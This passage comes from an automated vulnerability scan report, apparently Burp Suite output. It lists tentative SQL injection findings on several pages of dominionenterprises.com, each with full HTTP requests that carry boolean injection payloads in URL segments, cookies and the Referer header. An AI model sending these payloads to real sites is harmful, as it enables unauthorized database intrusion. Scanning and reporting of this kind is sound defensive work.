1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
2.35. http://www.dominionenterprises.com/main/do/Advertiser_Agreement [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/Advertiser_Agreement

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 35525155'%20or%201%3d1--%20 and 35525155'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/Advertiser_Agreement35525155'%20or%201%3d1--%20 HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725151554; s_lv=1304725151555; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:23 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=bdf614ab3757af735415e00061963d45; expires=Sun, 08 May 2011 19:37:23 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:37:23 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 32708

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Home</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Home">
   <meta name="keywords" content="Home">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">

<script language="javascript" type="text/javascript">
var IsIPad = false;
function QueryStringIsRequestFromMobile(DirectToFullSite) {
Queries = window.location.search.substring(1);
if (Queries == "" || Queries == null) {
return false;
}
else {
QueryArray = Queries.split("&");
for (i = 0; i < QueryArray.length; i++) {
QueryValue = QueryArray[i].split("=");
if (QueryValue[0] == DirectToFullSite) {
if (QueryValue[1] == "fs24lmj09")
return true;
else
return false;
}
else
return false;
}
}
}
function IsMobileRedirection() {
var agent = navigator.userAgent.toLowerCase();
var IsMobile = false;
if ((agent.indexOf('absinthe') != -1) ||
(agent.indexOf('albacore') !
...[SNIP]...

Request 2

GET /main/do/Advertiser_Agreement35525155'%20or%201%3d2--%20 HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725151554; s_lv=1304725151555; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:23 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=e7b89d9d22ee322e26c928d489ab60ae; expires=Sun, 08 May 2011 19:37:23 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:37:23 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Length: 0
Content-Type: text/html
Set-Cookie: TSa27990=17226455681a23b43340e174788d7a47cf55f197b0915ed34dc443f49c5eca853e60e59c; Path=/

2.36. http://www.dominionenterprises.com/main/do/Advertiser_Agreement [s_sq cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/Advertiser_Agreement

Issue detail

The s_sq cookie appears to be vulnerable to SQL injection attacks. The payloads 64212002'%20or%201%3d1--%20 and 64212002'%20or%201%3d2--%20 were each submitted in the s_sq cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/Advertiser_Agreement HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725151554; s_lv=1304725151555; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D64212002'%20or%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:57 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=dba9e76780dab5082f6ad3b40d81f7c9; expires=Sun, 08 May 2011 19:35:57 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:35:57 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Set-Cookie: TSa27990=a6085532e0617f3f26069bb7f806dc6988fcd6e4d06ed9974dc443569c5eca85b77317fc; Path=/
Content-Length: 34603

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Advertising User Agreement</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Advertising User Agreement">
   <meta name="keywords" content="Advertising User Agreement">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/style.css" type="text/css">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/menu.css" type="text/css">
   
   <!-- calendar stylesheet -->
   <link rel="stylesheet" type="text/css" media="all" href="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-blue.css" title="win2k-cold-1" />

       
   <!-- main calendar program -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js"></script>
<!-- language for the calendar -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js"></script>
<!-- the following script defines the Calendar.setup helper function,
...[SNIP]...

Request 2

GET /main/do/Advertiser_Agreement HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725151554; s_lv=1304725151555; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D64212002'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:57 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=6fbc3a6086880dcc38961944854f905d; expires=Sun, 08 May 2011 19:35:57 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:35:57 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 34603

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Advertising User Agreement</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Advertising User Agreement">
   <meta name="keywords" content="Advertising User Agreement">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/style.css" type="text/css">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/menu.css" type="text/css">
   
   <!-- calendar stylesheet -->
   <link rel="stylesheet" type="text/css" media="all" href="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-blue.css" title="win2k-cold-1" />

       
   <!-- main calendar program -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js"></script>
<!-- language for the calendar -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js"></script>
<!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines of code. -->
<script type="text/javascript
...[SNIP]...
2.37. http://www.dominionenterprises.com/main/do/Careers [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/Careers

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 72254876'%20or%201%3d1--%20 and 72254876'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/Careers72254876'%20or%201%3d1--%20 HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:36:43 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=ad448786cf2b76ce54480dea55d64ae9; expires=Sun, 08 May 2011 19:36:43 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:36:43 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 32708

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Home</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Home">
   <meta name="keywords" content="Home">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">

<script language="javascript" type="text/javascript">
var IsIPad = false;
function QueryStringIsRequestFromMobile(DirectToFullSite) {
Queries = window.location.search.substring(1);
if (Queries == "" || Queries == null) {
return false;
}
else {
QueryArray = Queries.split("&");
for (i = 0; i < QueryArray.length; i++) {
QueryValue = QueryArray[i].split("=");
if (QueryValue[0] == DirectToFullSite) {
if (QueryValue[1] == "fs24lmj09")
return true;
else
return false;
}
else
return false;
}
}
}
function IsMobileRedirection() {
var agent = navigator.userAgent.toLowerCase();
var IsMobile = false;
if ((agent.indexOf('absinthe') != -1) ||
(agent.indexOf('albacore') !
...[SNIP]...

Request 2

GET /main/do/Careers72254876'%20or%201%3d2--%20 HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:36:43 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=7498864a68df42f076f73d37ca5f499f; expires=Sun, 08 May 2011 19:36:43 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:36:43 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Length: 0
Content-Type: text/html

2.38. http://www.dominionenterprises.com/main/do/Careers [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/Careers

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 12491798'%20or%201%3d1--%20 and 12491798'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/Careers HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=12491798'%20or%201%3d1--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:29 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=50020d3c5d5f588a1b914a2e77bc27a7; expires=Sun, 08 May 2011 19:35:29 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:35:29 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Set-Cookie: TSa27990=46792d7b37bb084f60dc2f6e1f256825516b4aa4839835dd4dc443829c5eca85df506b6d; Path=/
Content-Length: 19076

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Careers</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Careers">
   <meta name="keywords" content="Careers">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/style.css" type="text/css">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/menu.css" type="text/css">
   
   <!-- calendar stylesheet -->
   <link rel="stylesheet" type="text/css" media="all" href="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-blue.css" title="win2k-cold-1" />

       
   <!-- main calendar program -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js"></script>
<!-- language for the calendar -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js"></script>
<!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines o
...[SNIP]...

Request 2

GET /main/do/Careers HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=12491798'%20or%201%3d2--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:29 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=f73a685d8d2810e0713139115067fb17; expires=Sun, 08 May 2011 19:35:29 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:35:29 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 19076

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Careers</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Careers">
   <meta name="keywords" content="Careers">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/style.css" type="text/css">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/menu.css" type="text/css">
   
   <!-- calendar stylesheet -->
   <link rel="stylesheet" type="text/css" media="all" href="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-blue.css" title="win2k-cold-1" />

       
   <!-- main calendar program -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js"></script>
<!-- language for the calendar -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js"></script>
<!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines of code. -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/js
...[SNIP]...
2.39. http://www.dominionenterprises.com/main/do/Careers [s_cc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/Careers

Issue detail

The s_cc cookie appears to be vulnerable to SQL injection attacks. The payloads 62583083'%20or%201%3d1--%20 and 62583083'%20or%201%3d2--%20 were each submitted in the s_cc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/Careers HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true62583083'%20or%201%3d1--%20; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:07 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=e2553f7484cb2c7783f3a5c243d53604; expires=Sun, 08 May 2011 19:35:07 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:35:07 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Set-Cookie: TSa27990=1e404d829976e6f2f6bbfbc4ca9a68ff17a0fb93ea548b494dc443259c5eca85caf3474a; Path=/
Content-Length: 19076

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Careers</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Careers">
   <meta name="keywords" content="Careers">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/style.css" type="text/css">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/menu.css" type="text/css">
   
   <!-- calendar stylesheet -->
   <link rel="stylesheet" type="text/css" media="all" href="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-blue.css" title="win2k-cold-1" />

       
   <!-- main calendar program -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js"></script>
<!-- language for the calendar -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js"></script>
<!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines o
...[SNIP]...

Request 2

GET /main/do/Careers HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true62583083'%20or%201%3d2--%20; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:07 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=ecde5f56d9a309efc466b068f1ee9147; expires=Sun, 08 May 2011 19:35:07 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:35:07 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 19076

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Careers</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Careers">
   <meta name="keywords" content="Careers">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/style.css" type="text/css">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/menu.css" type="text/css">
   
   <!-- calendar stylesheet -->
   <link rel="stylesheet" type="text/css" media="all" href="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-blue.css" title="win2k-cold-1" />

       
   <!-- main calendar program -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js"></script>
<!-- language for the calendar -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js"></script>
<!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines of code. -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/js
...[SNIP]...
2.40. http://www.dominionenterprises.com/main/do/For_Businesses [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/For_Businesses

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 16640137'%20or%201%3d1--%20 and 16640137'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/For_Businesses16640137'%20or%201%3d1--%20 HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.dominionenterprises.com/main/do/Advertiser_Agreement
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; PHPSESSID=6fd5a07363603c0a3f4685bb1fb4e9b2; TSa27990=d77c9a2ab2f3f328d9ee79ee1dcd6b0b3a05433071c0aed34dc4432a9c5eca8583c4cdbd; WT_FPC=id=227919100c685f30f311304725152629:lv=1304725152629:ss=1304725152629; s_nr=1304725175943; s_lv=1304725175944; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:58 GMT
X-Powered-By: PHP/4.4.2
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:37:58 GMT
